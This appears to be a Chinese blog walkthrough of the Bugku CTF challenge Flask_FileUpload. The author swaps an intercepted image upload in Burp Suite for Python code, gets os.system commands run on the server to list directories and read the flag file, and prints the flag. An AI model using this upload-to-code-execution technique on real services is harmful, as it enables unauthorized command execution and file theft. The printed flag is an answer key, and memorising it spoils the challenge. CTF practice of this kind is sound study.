热门标签
热门文章
- 1了解O2OA(翱途)开发平台中的VIP应用
- 2NLP_Python3——jieba中文处理_jieba lcut和lcut_for_search区别
- 3NLP算法-词性标注_nlp词性标注
- 4[深度学习TF2][RNN-LSTM]文本情感分析包含(数据预处理-训练-预测)_lstm预测模型tf2
- 5弹窗中的彩蛋,一款在线开发工具 JupyterNotebook,一篇博客就会用|Python技能树测评_在线开发notebook
- 6基于ChatGPT的智能客服助手_chatgpt怎么做客服系统
- 72022人机交互-考题复习_在人机交互领域,计算机可能指的是
- 8GroundingDINO运行教程_groundingdino_swint_ogc.pth
- 9计算机二级Ms office考试经验贴_cct二级office高级应用考试时长
- 10逐帧分析,Devin如何成为AI软件开发者_devin ai
当前位置: article > 正文
bugku CTF练习:Flask_FileUpload思路_bugctf flask_fileupload
作者:菜鸟追梦旅行 | 2024-04-08 06:33:06
赞
踩
bugctf flask_fileupload
https://ctf.bugku.com/challenges/detail/id/204.html
打开页面是这个样子。右键查看源代码。
它提示我说会用Python去执行。太棒了。
选择一张普通图片。点击上传。把流量转到burpsuite上。
把burpsuite上抓到的包发送到重发模块
把图片的内容删除。改成
import os
print(os.system('ls -al'))
发现执行了Python,想了一下。应该是Python执行系统命令。
一步一步。发现上一级目录上有一个flag的文件。
执行下面的代码:
import os
print(os.system('cat ../flag'))
就得到了flag
flag{5f40e0bdb1089bf9dcb06a384c2b2008}
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/383590
推荐阅读
相关标签
